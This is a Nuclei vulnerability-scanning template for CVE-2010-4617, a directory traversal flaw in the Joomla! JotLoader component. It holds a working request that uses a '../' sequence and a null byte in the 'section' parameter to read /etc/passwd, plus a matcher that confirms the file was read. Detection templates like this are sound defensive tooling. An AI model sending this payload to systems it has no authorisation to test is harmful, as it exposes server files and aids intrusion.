42 lines
1.5 KiB
YAML
42 lines
1.5 KiB
YAML
id: CVE-2010-4617
|
|
|
|
info:
|
|
name: Joomla! Component JotLoader 2.2.1 - Local File Inclusion
|
|
author: daffainfo
|
|
severity: medium
|
|
description: A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
|
|
remediation: Upgrade to the latest version to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/15791
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2010-4617
|
|
- http://packetstormsecurity.org/files/view/96812/joomlajotloader-lfi.txt
|
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/64223
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
|
|
cvss-score: 6.8
|
|
cve-id: CVE-2010-4617
|
|
cwe-id: CWE-22
|
|
epss-score: 0.00826
|
|
epss-percentile: 0.79974
|
|
cpe: cpe:2.3:a:kanich:com_jotloader:2.2.1:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: kanich
|
|
product: com_jotloader
|
|
tags: cve,cve2010,joomla,lfi,edb,packetstorm,kanich
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a004730450220751daf98adf2fc76934784b506a2c313a9dd325da74db77eae0a899a5604ffe4022100b96e21a4ede659a8c6da54c294a86ed5fa7dcf1f33dac72cac2ef36ed15ef7c0:922c64590222798bb761d5b6d8e72950 |